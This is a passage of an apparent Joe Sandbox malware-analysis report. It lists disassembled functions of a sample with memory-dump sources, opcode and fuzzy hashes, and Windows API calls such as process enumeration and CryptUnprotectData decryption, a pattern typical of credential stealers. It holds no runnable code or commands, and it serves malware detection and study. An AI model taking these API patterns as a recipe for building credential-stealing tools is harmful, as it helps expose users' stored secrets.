                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: e32b4692d2d47374cdbf35f73c8c1fb8b4e009dde064d2717e46a4e2d8a65776
                          • Instruction ID: 4114e81c529c00c6659f4bb76314ce0a9d0dddd771a014a2cbf73b22f6573084
                          • Opcode Fuzzy Hash: e32b4692d2d47374cdbf35f73c8c1fb8b4e009dde064d2717e46a4e2d8a65776
                          • Instruction Fuzzy Hash: AF010C75A00318ABDB14DFA5DD88BEDBBF9FB48701F104298A909A6240D7349B44CF61
                          Function 009D55C3 Relevance: 6.6, Strings: 4, Instructions: 1630COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: O}?$[lg=$j"~_$ox6s
                          • API String ID: 0-1547867405
                          • Opcode ID: 4460ba1c3123cc68d1c2f8652a95212427b58edd912af9e8ebd71f71c063c89f
                          • Instruction ID: 7dd465cc92ed3da8192977231344eb1b367a7a942d7aa18a57b36458c3af9a4f
                          • Opcode Fuzzy Hash: 4460ba1c3123cc68d1c2f8652a95212427b58edd912af9e8ebd71f71c063c89f
                          • Instruction Fuzzy Hash: 24B219F3A0C2049FE3086E2DEC9567ABBE9EF94320F16453DEAC587744EA3558048797
                          Function 009CEB0F Relevance: 6.6, Strings: 4, Instructions: 1609COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: F1>y$W7{+$d%F$|[q7
                          • API String ID: 0-3669604176
                          • Opcode ID: b0a6ec2b70337e6c515422d709e813719c4b836e3379e41e00abc772b71b8cea
                          • Instruction ID: d36e500c285596c78ad73e62da266de779ce29eaaff87a6521ba553558aa9fb5
                          • Opcode Fuzzy Hash: b0a6ec2b70337e6c515422d709e813719c4b836e3379e41e00abc772b71b8cea
                          • Instruction Fuzzy Hash: 9DB218F360C2049FE7046E29EC8567ABBEAEFD4720F1A453DE6C4C7744EA3598018697
                          Function 00628EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00615184,40000001,00000000,00000000,?,00615184), ref: 00628EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: c05ed17a2b228801b9ac9f6cabbe2cbc39e61b4f6fb1e7cb5bb39811027ba440
                          • Instruction ID: 851462d85b06a26289dfde10d3323006e069a7dafc9da749325c2d34cb799541
                          • Opcode Fuzzy Hash: c05ed17a2b228801b9ac9f6cabbe2cbc39e61b4f6fb1e7cb5bb39811027ba440
                          • Instruction Fuzzy Hash: 8F110370201608BFDB04CF64EC84FAA37AABF89341F109558F9198B250DB39E842DF60
                          Function 00627A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0111DF18,00000000,?,00630E10,00000000,?,00000000,00000000), ref: 00627A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0111DF18,00000000,?,00630E10,00000000,?,00000000,00000000,?), ref: 00627A7D
                          • wsprintfA.USER32 ref: 00627AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 1cc82cae435535d6e8e46d06d7c63d3354eb048613632ae22776bd7877dd0966
                          • Instruction ID: 1b4e3249997b30915e1a2d328bab7b94817ecbb6ff066db729aaa9a9fbbca956
                          • Opcode Fuzzy Hash: 1cc82cae435535d6e8e46d06d7c63d3354eb048613632ae22776bd7877dd0966
                          • Instruction Fuzzy Hash: F311A5B1945628EBEB14CF54DC55FA9B778FB04722F1043A5E906932C0C7745E40CF51
                          Function 00623720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0062E118,00000000,00000001,0062E108,00000000), ref: 00623758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006237B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: b3156e131bbb9c17cf4389c19416709e04e537372b705d3560a2c373dc7ead01
                          • Instruction ID: 6a021a10c8a1e2ae1a2ea331af8f2cea11b1e55239ba5f547637a54fbe686f51
                          • Opcode Fuzzy Hash: b3156e131bbb9c17cf4389c19416709e04e537372b705d3560a2c373dc7ead01
                          • Instruction Fuzzy Hash: 80410971A00A289FDB24DF58DC94B9BB7B5BB48702F4081D8E608EB2D0E7756E85CF50
                          Function 00619B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00619B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00619BA3
                          • LocalFree.KERNEL32(?), ref: 00619BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 308f73c75a5942d3d98b9ccc460b13450ab769be47c41bec47ceafe03781185e
                          • Instruction ID: 8fd2dc5d3501b3870dfa8d485d72bb8f9ad0f596a9cd572542431d1925548c8c
                          • Opcode Fuzzy Hash: 308f73c75a5942d3d98b9ccc460b13450ab769be47c41bec47ceafe03781185e
                          • Instruction Fuzzy Hash: 9011C9B8A00209EFDB04DF94D985AEEB7B5FF88301F104598E915A7350D774AE50CFA1
                          Function 009CB578 Relevance: 4.2, Strings: 2, Instructions: 1653COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: O_CE$jqn
                          • API String ID: 0-219872878
                          • Opcode ID: 9843c825a904ce8ef9555aa8276c9665bec8db1dae8d4ec98cd46f4179206125
                          • Instruction ID: 086be442f3abc391205ddf7fd61b498ac5526b3c245d6f74c7f6f18492a316bd
                          • Opcode Fuzzy Hash: 9843c825a904ce8ef9555aa8276c9665bec8db1dae8d4ec98cd46f4179206125
                          • Instruction Fuzzy Hash: 04B2F8F36082009FE308AE2DEC9577ABBE9EFD4320F1A453DE6C5C7744EA3558418696
                          Function 008F0FEF Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: kBM
                          • API String ID: 0-2784965917
                          • Opcode ID: 162fc4671418f9ad34e4e2bb40c95451581a5d137e591c8cd937fd83f44b2222
                          • Instruction ID: 2dbc73f30ccc827c390e72163aacbffa537986f6d13eed6c8dcbfb5e831b2759
                          • Opcode Fuzzy Hash: 162fc4671418f9ad34e4e2bb40c95451581a5d137e591c8cd937fd83f44b2222
                          • Instruction Fuzzy Hash: 698124B39083189FE3046E3DDC8432AFBD9EB94760F174A3EEAC4D3644E57959058792
                          Function 0094DEB8 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ' uv
                          • API String ID: 0-3485620161
                          • Opcode ID: 366b32958a1e2c62870a030b87f0eaf78a3d381a70a1b0e60c1288a8af3e7ea1
                          • Instruction ID: 24e2d6c36823705dfe45f40075b4983395de27e0be942535cadc42ea6592753c
                          • Opcode Fuzzy Hash: 366b32958a1e2c62870a030b87f0eaf78a3d381a70a1b0e60c1288a8af3e7ea1
                          • Instruction Fuzzy Hash: 495135F3E093105BF3016E29DCC136ABBD6DB98324F2B863DDA8893784E9395C0546C6
                          Function 009BDAAB Relevance: .2, Instructions: 230COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 82d5adef1a723985f1da7eaa05f0f89a02db1eafb5e23e06c6b08fd9f74bc837
                          • Instruction ID: 825d95d3a41330a350df74f9b95c0e143c00207aa2593a9ed10275585157c67e
                          • Opcode Fuzzy Hash: 82d5adef1a723985f1da7eaa05f0f89a02db1eafb5e23e06c6b08fd9f74bc837
                          • Instruction Fuzzy Hash: 726135F3A082189FE310BE3DEC4576AFBE9EB94350F16853DE9C897384E93558048692
                          Function 0091014B Relevance: .2, Instructions: 217COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21c33109924291e3a8cbf0f2485fae14e5d3267181b70518bfd091ed150e1a90
                          • Instruction ID: 3768a22af1633f94ecb81c18eaff0ad65ae44ebb3dc16f31041d3254e0d59d07
                          • Opcode Fuzzy Hash: 21c33109924291e3a8cbf0f2485fae14e5d3267181b70518bfd091ed150e1a90
